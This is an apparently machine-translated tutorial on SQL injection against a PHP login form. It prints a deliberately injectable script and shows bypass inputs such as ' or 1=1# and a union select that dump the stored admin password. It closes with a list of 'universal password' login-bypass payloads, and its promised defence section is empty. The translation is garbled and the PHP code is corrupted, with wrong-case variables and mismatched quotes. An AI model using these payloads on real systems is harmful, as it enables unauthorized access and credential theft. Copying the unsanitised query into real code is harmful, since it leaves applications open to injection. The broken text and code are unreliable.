Sql_injection Second Hair

1. Code article

Name:<input type= "text" name= "user" ><br>Password:<input type= "text" name= "pass" ><br><input type= "Submit" name= "submit" value= "Submit" ></center> PHP/*************************author:blooderosql_injection_post*************************/include(".. /conn.php ");error_reporting(0);if(isset($_post[' Submit '])){    if(!Empty($_post[' User ']) &&!Empty($_post[' Pass '])){        $user=$_post[' User ']; $pass=$_post[' Pass ']; Echo"You are currently entering the user name:".$user." <br> "; Echo"You are currently entering the password:".$pass." <br> "; $sql= "SELECT * from user where username= '$user' and password= '$pass‘"; $res=mysql_query($sql); $row=Mysql_fetch_array($res); if(Empty($row)){            Echo"<script>alert (' Landing failed ') </script>"; }        Else{            Echo"Current User:<br>"; Echo"ID:".$row[' ID ']. " <br> "; Echo"Username:".$row[' username ']. " <br> "; Echo"Password:".$row[' Password ']. " <br> "; }    }    Else{        Echo"<script>alert (' username/password cannot be empty ') </script>"; }}Else{    Exit();}?>

2, injected into the article: http://localhost/pentest/sql/sql_injection_post.php

Correct input:

you currently enter the user name: admin you enter password: Pass Current User: ID:1username:adminpassword:pass

Try to inject:

You currently enter a user name: 1 ' you currently enter the password: 1

Login failed

You are currently entering a user name: 1 ' #你当前输入密码: 1

Login failed

You currently enter a user name: 1 ' or 1=1# your current password: 1 Current User: Id:1username:adminpassword:pass

Landing success

You are currently entering a username: 1 ' or 1=2# your current password: 1

Login failed

Here I explain the principle:

When we close the where statement and then the or 1=2, this time the constant false, so there will be no result;

When we pick up or 1=1, the constant is true, so we will query all;

You are currently entering user name: 1 ' and 1=2 Union SELECT * FROM user# you currently enter password: 1 Current User: Id:1username:adminpassword:pass

Here the principle does not understand can go to see the first hair sql_injection;

3, anti-injection

To post the data, the processing; there will be a detailed explanation

4, through the post injection, the introduction of the Universal password

"or" a "="a') or (' a ' = '1=1--'or ' 1=1--a' or ' 1=1--admin' or ' a ' = 'a password is random ' or 1 = 1/* user:something  Pass: ' or ' 1 ' = ' one ' or ' 1 ' = ' 1admin ' or 1=1/*

Sql_injection Second Hair